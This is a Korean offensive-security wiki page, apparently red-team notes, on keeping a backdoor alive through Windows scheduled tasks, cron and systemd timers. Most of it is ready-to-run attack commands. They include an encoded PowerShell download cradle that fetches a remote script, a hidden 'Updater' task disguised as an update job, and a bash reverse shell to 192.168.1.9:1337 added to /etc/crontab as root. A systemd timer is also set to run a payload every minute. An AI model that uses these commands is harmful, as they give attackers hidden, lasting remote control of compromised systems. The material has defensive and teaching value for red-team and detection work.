Task Scheduler

작업 스케줄러에 백도어를 설치하면 원하는 주기 혹은 시간에 맞춰 비콘 연결을 지속할 수 있습니다.

Abuse

# Invoke-Expression을 통해 다운로드 하는 명령어 Base64로 저장
$str = 'iex ((new-object net.webclient).downloadstring("http://example.com/reverse.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

# Updater 작업 스케줄러 생성
$TaskName = "Updater"
$PSEXE = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$EncodedArgs = "-nop -w hidden -enc <Base64 Encoded Command>"
$Action = New-ScheduledTaskAction -Execute $PSEXE -Argument $EncodedArgs
$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
$Principal = New-ScheduledTaskPrincipal -UserId "$env:USERNAME" -LogonType Interactive
Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Principal $Principal

Cron scheduler

# 리버스 쉘 코드 입력 및 권한부여
echo - e '#!/bin/bash\nsh -i >& /dev/tcp/192.168.1.9/1337 0>&1' > rev.sh
chmod +x rev.sh

# 크론 스케줄러에 등록 및 확인
echo '* * * * * root /tmp/rev.sh' >> /etc/crontab
tail -f /var/log/syslog | grep CRON

Systemed Timer

# Systemd 파일에 서비스 등록 및 권한 부여
echo -e '[Service]\nExecStart=/bin/bash <PATH>' > /etc/systemd/system/rev.service
chmod +x rev.sh

# 시스템을 실행하는 주기를 매분 00초로 설정
echo -e '[Timer]\nOnCalendar=*-*-* *:*:00\nPersistent=true\n[Install]\nWantedBy=timers.target' > /etc/systemd/system/rev.timer

# 데몬 재기동 및 타이머 활성화 및 확인
systemctl daemon-reload
systemctl enable --now rev.timer
systemctl list-timers

References

Scheduled Task/Job: Systemd Timers, Sub-technique T1053.006 - Enterprise | MITRE ATT&CK®

PreviousLocal NextStartup Folder

Last updated 9 days ago

Was this helpful?